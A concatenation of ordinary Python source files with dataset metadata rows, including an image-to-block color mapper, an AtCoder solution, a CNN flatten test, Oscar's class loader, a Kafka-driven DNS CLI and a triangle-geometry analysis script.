frame_string_string = f"0{spongebob_frame}"
else:
frame_string_string = f"{spongebob_frame}"
while not os.path.exists(f"./ep_{EPISODE_STRING}/images/{frame_string_string}.png"):
for i in reversed(range(1, 16)):
os.system('cls')
print(f"On frame: {frame_string_string}")
print(f"Waiting {i} seconds for the image to get downloaded...")
time.sleep(1)
os.system('cls')
print(f"On frame: {frame_string_string}")
testimage = Image.open(f"./ep_{EPISODE_STRING}/images/{frame_string_string}.png")
height = testimage.height
width = testimage.width
testimage_rgb = testimage.convert("RGB")
if height+4>=255:
print("Image is too big!")
exit()
def closest_color(rgb):
r, g, b = rgb
color_diffs = []
for color in COLORS["blocks_rgb"]:
cr, cg, cb = color
color_diff = sqrt(abs(r - cr)**2 + abs(g - cg)**2 + abs(b - cb)**2)
color_diffs.append((color_diff, color))
return min(color_diffs)[1]
made_changes = False
for y in range(0, height):
for x in range(0, width):
if spongebob_frame < 135:
if not frame_string_string in frame_rgb_data1:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data1[frame_string_string] = []
frame_rgb_data1[frame_string_string].append([])
frame_rgb_data1[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data1[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data1[frame_string_string].append([])
frame_rgb_data1[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data1[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data1[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 270:
if not frame_string_string in frame_rgb_data2:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data2[frame_string_string] = []
frame_rgb_data2[frame_string_string].append([])
frame_rgb_data2[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data2[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data2[frame_string_string].append([])
frame_rgb_data2[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data2[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data2[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 405:
if not frame_string_string in frame_rgb_data3:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data3[frame_string_string] = []
frame_rgb_data3[frame_string_string].append([])
frame_rgb_data3[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data3[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data3[frame_string_string].append([])
frame_rgb_data3[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data3[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data3[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 540:
if not frame_string_string in frame_rgb_data4:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data4[frame_string_string] = []
frame_rgb_data4[frame_string_string].append([])
frame_rgb_data4[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data4[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data4[frame_string_string].append([])
frame_rgb_data4[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data4[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data4[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 675:
if not frame_string_string in frame_rgb_data5:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data5[frame_string_string] = []
frame_rgb_data5[frame_string_string].append([])
frame_rgb_data5[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data5[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data5[frame_string_string].append([])
frame_rgb_data5[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data5[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data5[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 810:
if not frame_string_string in frame_rgb_data6:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data6[frame_string_string] = []
frame_rgb_data6[frame_string_string].append([])
frame_rgb_data6[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data6[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data6[frame_string_string].append([])
frame_rgb_data6[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data6[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data6[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 945:
if not frame_string_string in frame_rgb_data7:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data7[frame_string_string] = []
frame_rgb_data7[frame_string_string].append([])
frame_rgb_data7[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data7[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data7[frame_string_string].append([])
frame_rgb_data7[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data7[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data7[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 1080:
if not frame_string_string in frame_rgb_data8:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data8[frame_string_string] = []
frame_rgb_data8[frame_string_string].append([])
frame_rgb_data8[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data8[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data8[frame_string_string].append([])
frame_rgb_data8[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data8[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data8[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 1215:
if not frame_string_string in frame_rgb_data9:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data9[frame_string_string] = []
frame_rgb_data9[frame_string_string].append([])
frame_rgb_data9[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data9[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data9[frame_string_string].append([])
frame_rgb_data9[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data9[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data9[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 1350:
if not frame_string_string in frame_rgb_data10:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data10[frame_string_string] = []
frame_rgb_data10[frame_string_string].append([])
frame_rgb_data10[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data10[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data10[frame_string_string].append([])
frame_rgb_data10[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data10[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data10[frame_string_string][y].append(get_block)
made_changes = True
else:
if not frame_string_string in frame_rgb_data11:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data11[frame_string_string] = []
frame_rgb_data11[frame_string_string].append([])
frame_rgb_data11[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data11[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data11[frame_string_string].append([])
frame_rgb_data11[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data11[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data11[frame_string_string][y].append(get_block)
made_changes = True
if made_changes:
if spongebob_frame < 135:
with open(f"./ep_{EPISODE_STRING}/rgb_values_1.json", "w") as outfile:
json.dump(frame_rgb_data1, outfile)
elif spongebob_frame < 270:
with open(f"./ep_{EPISODE_STRING}/rgb_values_2.json", "w") as outfile:
json.dump(frame_rgb_data2, outfile)
elif spongebob_frame < 405:
with open(f"./ep_{EPISODE_STRING}/rgb_values_3.json", "w") as outfile:
json.dump(frame_rgb_data3, outfile)
elif spongebob_frame < 540:
with open(f"./ep_{EPISODE_STRING}/rgb_values_4.json", "w") as outfile:
json.dump(frame_rgb_data4, outfile)
elif spongebob_frame < 675:
with open(f"./ep_{EPISODE_STRING}/rgb_values_5.json", "w") as outfile:
json.dump(frame_rgb_data5, outfile)
elif spongebob_frame < 810:
with open(f"./ep_{EPISODE_STRING}/rgb_values_6.json", "w") as outfile:
json.dump(frame_rgb_data6, outfile)
elif spongebob_frame < 945:
with open(f"./ep_{EPISODE_STRING}/rgb_values_7.json", "w") as outfile:
json.dump(frame_rgb_data7, outfile)
elif spongebob_frame < 1080:
with open(f"./ep_{EPISODE_STRING}/rgb_values_8.json", "w") as outfile:
json.dump(frame_rgb_data8, outfile)
elif spongebob_frame < 1215:
with open(f"./ep_{EPISODE_STRING}/rgb_values_9.json", "w") as outfile:
json.dump(frame_rgb_data9, outfile)
elif spongebob_frame < 1350:
with open(f"./ep_{EPISODE_STRING}/rgb_values_10.json", "w") as outfile:
json.dump(frame_rgb_data10, outfile)
else:
with open(f"./ep_{EPISODE_STRING}/rgb_values_11.json", "w") as outfile:
json.dump(frame_rgb_data11, outfile)
print(f"Finished frame: {frame_string_string}")
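# --- Hedged refactoring sketch (not part of the original script) ---
# The eleven frame_rgb_dataN branches above differ only in which dictionary they
# fill and which rgb_values_N.json file they are flushed to. The helper names
# below (closest_block, append_pixel, demo_palette, demo_buckets) are illustrative;
# the chunking assumes the same 135-frame boundaries used above.
def closest_block(rgb, palette):
    """Return the block name whose RGB entry is nearest to rgb (Euclidean distance)."""
    r, g, b = rgb
    best = min(palette["blocks_rgb"],
               key=lambda c: sqrt((r - c[0]) ** 2 + (g - c[1]) ** 2 + (b - c[2]) ** 2))
    return palette[f"{best[0]} {best[1]} {best[2]}"][0]

def append_pixel(buckets, frame_number, frame_key, y, block):
    """Grow the frame -> rows -> blocks structure, one list per image row."""
    bucket = buckets[min(frame_number // 135, len(buckets) - 1)]
    rows = bucket.setdefault(frame_key, [])
    if len(rows) == y:
        rows.append([])
    rows[y].append(block)

# Tiny self-contained usage with a stand-in palette (the real COLORS dict is above).
demo_palette = {"blocks_rgb": [[20, 21, 25], [233, 236, 236]],
                "20 21 25": ["black_wool"], "233 236 236": ["white_wool"]}
demo_buckets = [{} for _ in range(11)]
append_pixel(demo_buckets, 140, "0140", 0, closest_block((10, 10, 10), demo_palette))
print(demo_buckets[1])  # {'0140': [['black_wool']]}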
| 27.1266
| 93
| 0.440509
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,689
| 0.149161
|
af6af919b708faefe930ae59ccea70a7cedd960e
| 210
|
py
|
Python
|
ABC/060/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
ABC/060/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
ABC/060/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
def main():
# input
A, B, C = input().split()
# compute
# output
if A[-1]==B[0] and B[-1]==C[0]:
print('YES')
else:
print('NO')
if __name__ == '__main__':
main()
| 13.125
| 35
| 0.438095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 43
| 0.204762
|
af6cc52ba6e57b394d26f12154df2f51b1b57cc5
| 636
|
py
|
Python
|
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | 19
|
2019-11-08T22:50:32.000Z
|
2022-03-14T22:29:21.000Z
|
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | null | null | null |
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | 7
|
2020-06-15T08:03:41.000Z
|
2021-10-01T11:22:58.000Z
|
import unittest
import numpy as np
from src.layers.flatten import Flatten
class TestFlatten(unittest.TestCase):
def test_flatten(self):
batch_size = 10
n_h, n_w, n_c = 32, 32, 3
a_prev = np.random.randn(batch_size, n_h, n_w, n_c)
f = Flatten()
f.init((n_h, n_w, n_c))
self.assertEqual(f.get_output_dim(), n_h * n_w * n_c)
self.assertTupleEqual(f.forward(a_prev, False).shape, (batch_size, n_h * n_w * n_c))
da, _, _ = f.backward(a_prev)
self.assertTupleEqual(da.shape, (batch_size, n_h, n_w, n_c))
np.testing.assert_array_almost_equal(a_prev, da)
| 30.285714
| 92
| 0.641509
| 557
| 0.875786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af6ea05a1f8f073a03f7dff7deddcb7bdfb3a4a9
| 3,976
|
py
|
Python
|
oscar/core/loading.py
|
owad/django-oscar
|
cfa69e37dc9abc97a7aff5c8616da319e1771008
|
[
"BSD-3-Clause"
] | 1
|
2022-03-17T19:26:13.000Z
|
2022-03-17T19:26:13.000Z
|
oscar/core/loading.py
|
aykut/django-oscar
|
ca3629e74ea1e0affc55d3de4e97f523e352d267
|
[
"BSD-3-Clause"
] | null | null | null |
oscar/core/loading.py
|
aykut/django-oscar
|
ca3629e74ea1e0affc55d3de4e97f523e352d267
|
[
"BSD-3-Clause"
] | 1
|
2019-03-23T10:26:02.000Z
|
2019-03-23T10:26:02.000Z
|
from imp import new_module
from django.conf import settings
class AppNotFoundError(Exception):
pass
def import_module(module_label, classes, namespace=None):
u"""
For dynamically importing classes from a module.
Eg. calling import_module('product.models') will search INSTALLED_APPS for
the relevant product app (default is 'oscar.product') and then import the
classes from there. If the class can't be found in the overriding module,
then we attempt to import it from within oscar.
We search the INSTALLED_APPS list to find the appropriate app string and
import that.
This is very similar to django.db.models.get_model although that is only
for loading models while this method will load any class.
"""
# Classes must be specified in order for __import__ to work correctly. It's
# also a good practice
if not classes:
raise ValueError("You must specify the classes to import")
# Arguments will be things like 'product.models' and so we
# we take the first component to find within the INSTALLED_APPS list.
app_name = module_label.rsplit(".", 1)[0]
for installed_app in settings.INSTALLED_APPS:
base_package = installed_app.split(".")[0]
module_name = installed_app.split(".", 2).pop() # strip oscar.apps
try:
# We search the second component of the installed apps
if app_name == module_name:
if base_package == 'oscar':
# Using core module explicitly
return _import_classes_from_module("oscar.apps.%s" % module_label, classes, namespace)
else:
# Using local override - check that requested module exists
local_app = "%s.%s" % (base_package, module_label)
try:
imported_local_mod = __import__(local_app, fromlist=classes)
                    except ImportError as e:
# Module doesn't exist, fall back to oscar core. This can be tricky
# as if the overriding module has an import error, it will get picked up
# here.
if str(e).startswith("No module named"):
return _import_classes_from_module("oscar.apps.%s" % module_label, classes, namespace)
raise e
# Found overriding module, merging custom classes with core
module = new_module(local_app)
imported_oscar_mod = __import__("oscar.apps.%s" % module_label, fromlist=classes)
for classname in classes:
if hasattr(imported_local_mod, classname):
if namespace:
namespace[classname] = getattr(imported_local_mod, classname)
else:
module.__setattr__(classname, getattr(imported_local_mod, classname))
else:
if namespace:
namespace[classname] = getattr(imported_oscar_mod, classname)
else:
module.__setattr__(classname, getattr(imported_oscar_mod, classname))
return module
except IndexError:
pass
raise AppNotFoundError("Unable to find an app matching %s in INSTALLED_APPS" % (app_name,))
def _import_classes_from_module(module_name, classes, namespace):
imported_module = __import__(module_name, fromlist=classes)
if namespace:
for classname in classes:
namespace[classname] = getattr(imported_module, classname)
return
module = new_module(module_name)
for classname in classes:
setattr(module, classname, getattr(imported_module, classname))
return module
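# --- Hedged usage sketch (not part of the original module) ---
# Following the docstring above; 'Item' is only an illustrative class name,
# substitute whichever classes the target app actually defines.
#
#   from oscar.core.loading import import_module
#
#   ns = {}
#   import_module('product.models', ['Item'], namespace=ns)   # ns['Item'] now holds the class
#   models = import_module('product.models', ['Item'])        # or use the returned synthetic module
#   item_class = models.Item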
| 46.232558
| 114
| 0.597837
| 43
| 0.010815
| 0
| 0
| 0
| 0
| 0
| 0
| 1,376
| 0.346076
|
af6f367d7cdaed06d634c9db91b020afc6d934e8
| 3,197
|
py
|
Python
|
domba/clis/start.py
|
sofyan48/domba
|
fbd891ce69325d56774114eb6ef71c8d0f5ab428
|
[
"MIT"
] | 1
|
2019-07-27T12:17:16.000Z
|
2019-07-27T12:17:16.000Z
|
domba/clis/start.py
|
meongbego/domba
|
fbd891ce69325d56774114eb6ef71c8d0f5ab428
|
[
"MIT"
] | null | null | null |
domba/clis/start.py
|
meongbego/domba
|
fbd891ce69325d56774114eb6ef71c8d0f5ab428
|
[
"MIT"
] | null | null | null |
from domba.clis.base import Base
from domba.libs import env_lib
from domba.libs import knot_lib
from domba.libs import kafka_lib
import os
class Start(Base):
"""
usage:
start slave
start master
Command :
Options:
-h --help Print usage
"""
def execute(self):
# knot_lib.utils.check_root()
broker_env = env_lib.utils.get_env_values_broker()
broker = broker_env['broker']+":"+broker_env['port']
topic = broker_env['topic']
group = broker_env['group']
flag = broker_env['flags']
if self.args['slave']:
try:
knot_lib.utils.log_err("Connecting to broker : "+broker)
consumer = kafka_lib.get_kafka_consumer(broker, topic, group)
except Exception as e:
knot_lib.utils.log_err("Not Connecting to broker : "+broker)
knot_lib.utils.log_err("Error: "+ str(e))
exit()
try:
for message in consumer:
type_command = None
message = message.value
for i in message:
try:
type_command = message[i]['type']
except Exception as e:
print("Set Your Types Command")
if type_command == "general":
knot_lib.parsing_data_general(message, broker)
elif type_command == "cluster":
knot_lib.parsing_data_cluster(message, broker, flags=flag)
else:
print("Type Command Not Found")
except KeyboardInterrupt:
print("Exited")
# except Exception as e:
# env_lib.utils.log_err(str(e))
exit()
if self.args['master']:
try:
knot_lib.utils.log_err("Connecting to broker : "+broker)
consumer = kafka_lib.get_kafka_consumer(broker, topic, group)
except Exception as e:
knot_lib.utils.log_err("Not Connecting to broker : "+broker)
knot_lib.utils.log_err("Error: "+ str(e))
exit()
try:
for message in consumer:
type_command = None
message = message.value
for i in message:
try:
type_command = message[i]['type']
except Exception as e:
print("Set Your Types Command")
if type_command == "general":
knot_lib.parsing_data_general(message, broker)
elif type_command == "cluster":
knot_lib.parsing_data_cluster(message, broker, flags=flag)
else:
print("Type Command Not Found")
except KeyboardInterrupt:
print("Exited")
# except Exception as e:
# env_lib.utils.log_err(str(e))
exit()
| 38.987805
| 82
| 0.483891
| 3,057
| 0.956209
| 0
| 0
| 0
| 0
| 0
| 0
| 656
| 0.205192
|
af6febf89f847660f4b9e84d576a390734dbb67d
| 2,214
|
py
|
Python
|
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | null | null | null |
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | 1
|
2020-08-07T13:04:43.000Z
|
2020-08-10T12:32:46.000Z
|
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | 1
|
2019-12-16T15:46:45.000Z
|
2019-12-16T15:46:45.000Z
|
import os
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import input_fn.input_fn_2d.data_gen_2dt.data_gen_t2d_util.tfr_helper as tfr_helper
os.environ["CUDA_VISIBLE_DEVICES"] = ""
tf.enable_eager_execution()
if __name__ == "__main__":
print("run IS2d_triangle")
# prefix = "val"
input_list_name = "lists/TFR_2dt_100k_unsorted_s50_areafix_train.lst"
with open(input_list_name) as fobj:
filename_list = [x.strip("\n") for x in fobj.readlines()]
print("input list hast {} files".format(len(filename_list)))
print("load&batch-test...")
raw_dataset = tf.data.TFRecordDataset(filename_list)
print(raw_dataset)
parsed_dataset = raw_dataset.map(tfr_helper.parse_t2d)
batch_size = 1000
max_batches = 10
parsed_dataset_batched = parsed_dataset.batch(batch_size)
# parsed_dataset_batched = parsed_dataset_batched.repeat(10)
print(parsed_dataset)
counter = 0
number_of_batches = 0
plt.figure()
min_area = 10000
for batch_idx, sample in enumerate(parsed_dataset_batched):
if batch_idx >= max_batches:
break
number_of_batches = batch_idx + 1
points = sample[1]["points"]
# points[batch_sample, point, component]
a_x = points[:, 0, 0]
a_y = points[:, 0, 1]
b_x = points[:, 1, 0]
b_y = points[:, 1, 1]
c_x = points[:, 2, 0]
c_y = points[:, 2, 1]
ab = np.sqrt((a_x - b_x) ** 2 + (a_y - b_y) ** 2)
bc = np.sqrt((b_x - c_x) ** 2 + (b_y - c_y) ** 2)
ca = np.sqrt((c_x - a_x) ** 2 + (c_y - a_y) ** 2)
areas = np.abs((a_x * (b_y - c_y) + b_x * (c_y - a_y) + c_x * (a_y - b_y)) / 2.0)
inner_circle = 2 * areas / (ab + bc + ca)
outer_circle = ab * bc * ca / (4.0 * areas)
min_area = np.minimum(min_area, np.min(areas))
print(areas)
print(inner_circle)
print(outer_circle)
plt.scatter(areas, inner_circle / outer_circle)
# print(a, a.shape)
print("min_area", min_area)
plt.show()
print("{} samples in list: {}".format(number_of_batches * batch_size, input_list_name))
print(" Done.")
print("Finished.")
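# --- Hedged sanity check (not part of the original script) ---
# The geometry above uses the shoelace area, inradius = 2*area/perimeter and
# circumradius = ab*bc*ca/(4*area). For a 3-4-5 right triangle this yields
# area 6.0, inradius 1.0 and circumradius 2.5:
a_x, a_y, b_x, b_y, c_x, c_y = 0.0, 0.0, 3.0, 0.0, 0.0, 4.0
ab = np.hypot(a_x - b_x, a_y - b_y)
bc = np.hypot(b_x - c_x, b_y - c_y)
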